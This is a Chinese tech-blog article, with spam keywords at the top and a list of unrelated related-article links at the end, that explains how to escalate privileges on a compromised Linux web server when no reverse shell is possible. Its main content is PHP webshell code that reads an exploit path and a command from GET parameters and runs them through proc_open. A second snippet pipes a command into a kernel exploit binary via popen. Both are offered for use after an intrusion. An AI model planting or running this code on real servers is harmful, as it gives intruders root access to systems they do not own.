亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

Linux下非交互式提權(quán)詳解

 更新時(shí)間:2017年03月16日 10:44:03   作者:該隱  
這篇文章主要介紹了Linux下非交互式提權(quán)的相關(guān)資料,文中介紹的非常詳細(xì),對(duì)大家具有一定的參考價(jià)值,需要的朋友們下面來(lái)一起看看吧。

前言

之前拿到某站的Webshell之后,在提權(quán)的時(shí)候發(fā)現(xiàn)網(wǎng)站不能反彈shell。而且,在滲透的時(shí)候經(jīng)常遇到那種不能反彈shell的,你的提權(quán)工具拿上去之后因?yàn)闆](méi)有交互式的環(huán)境,也不知道提權(quán)是否成功。因此,寫(xiě)了一個(gè)簡(jiǎn)單的工具。需要的朋友們可以參考學(xué)習(xí)。

方法如下

proce_open()

// path是提權(quán)工具的絕對(duì)路徑,例如:/usr/local/htdocs/2.6.18
// cmd是你需要執(zhí)行的命令,例如:whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
 $path = $_GET['path'];
 $cmd = $_GET['cmd'];
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
 );
 $process = proc_open($path, $descriptorspec, $pipes);
 
 if (is_resource($process)) {
  fwrite($pipes[0],$cmd);
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  echo stream_get_contents($pipes[2]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  $return_value = proc_close($process);
 }  
}

代碼很簡(jiǎn)單,不懂的可以看看PHP手冊(cè),popen()在這里也可以實(shí)現(xiàn)相同的效果

另外,有了這個(gè)代碼之后,我們以后提權(quán)是不是就可以直接把提權(quán)工具扔到服務(wù)器上面,然后PHP代碼改一改,循環(huán)測(cè)試哪些提權(quán)工具是可用的了。

popen()

這是土司之前一個(gè)人發(fā)的,代碼原封不動(dòng)的放在了下面。稍微改一改就能達(dá)到上面一樣的效果

$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來(lái)一定的幫助,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。

相關(guān)文章

  • CentOS7掛載新數(shù)據(jù)盤(pán)的完整步驟

    CentOS7掛載新數(shù)據(jù)盤(pán)的完整步驟

    這篇文章主要給大家介紹了關(guān)于CentOS7掛載新數(shù)據(jù)盤(pán)的完整步驟,文中通過(guò)示例代碼將實(shí)現(xiàn)的步驟介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用CentOS7具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-06-06
  • Linux下使用ip netns命令進(jìn)行網(wǎng)口的隔離和配置ip地址

    Linux下使用ip netns命令進(jìn)行網(wǎng)口的隔離和配置ip地址

    這篇文章主要介紹了Linux下使用ip netns命令進(jìn)行網(wǎng)口的隔離和配置ip地址,本文給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-09-09
  • Linux與windows文件傳輸詳解及實(shí)例

    Linux與windows文件傳輸詳解及實(shí)例

    這篇文章主要介紹了Linux與windows文件傳輸詳解及實(shí)例的相關(guān)資料,需要的朋友可以參考下
    2017-03-03
  • 詳解Linux文件中的數(shù)據(jù)是如何被寫(xiě)進(jìn)磁盤(pán)

    詳解Linux文件中的數(shù)據(jù)是如何被寫(xiě)進(jìn)磁盤(pán)

    Linux 中,我們的每一個(gè)進(jìn)程,打開(kāi)的每一個(gè)文件都要有自己的 struct inode 對(duì)象和自己的文件頁(yè)緩沖區(qū)(就是所謂的內(nèi)核緩沖區(qū)),本文我們給大家介紹了Linux文件中的數(shù)據(jù)是如何被寫(xiě)進(jìn)磁盤(pán),需要的朋友可以參考下
    2024-05-05
  • 在 RHEL8 /CentOS8 上建立多節(jié)點(diǎn) Elastic stack 集群的方法

    在 RHEL8 /CentOS8 上建立多節(jié)點(diǎn) Elastic stack 集群的方法

    Elastic stack 俗稱 ELK stack,是一組包括 Elasticsearch、Logstash 和 Kibana 在內(nèi)的開(kāi)源產(chǎn)品。Elastic Stack 由 Elastic 公司開(kāi)發(fā)和維護(hù)。這篇文章主要介紹了如何在 RHEL8 /CentOS8 上建立多節(jié)點(diǎn) Elastic stack 集群,需要的朋友可以參考下
    2019-09-09
  • Linux使用fdisk實(shí)現(xiàn)磁盤(pán)分區(qū)過(guò)程圖解

    Linux使用fdisk實(shí)現(xiàn)磁盤(pán)分區(qū)過(guò)程圖解

    這篇文章主要介紹了Linux使用fdisk實(shí)現(xiàn)磁盤(pán)分區(qū)過(guò)程圖解,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-08-08
  • Linux解壓JAR包 查看class內(nèi)容方式

    Linux解壓JAR包 查看class內(nèi)容方式

    這篇文章主要介紹了Linux解壓JAR包 查看class內(nèi)容方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-11-11
  • Linux搭建自己Nexus私服的實(shí)現(xiàn)方法

    Linux搭建自己Nexus私服的實(shí)現(xiàn)方法

    這篇文章主要介紹了Linux搭建自己Nexus私服的實(shí)現(xiàn)方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-10-10
  • 如何在Linux中修改tomcat端口號(hào)

    如何在Linux中修改tomcat端口號(hào)

    這篇文章主要介紹了如何在Linux中修改tomcat端口號(hào),文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-05-05
  • Centos6 網(wǎng)絡(luò)配置的實(shí)例詳解

    Centos6 網(wǎng)絡(luò)配置的實(shí)例詳解

    這篇文章主要介紹了Centos6 網(wǎng)絡(luò)配置的實(shí)例詳解的相關(guān)資料,希望通過(guò)本文大家能夠掌握配置網(wǎng)絡(luò)的知識(shí),需要的朋友可以參考下
    2017-09-09

最新評(píng)論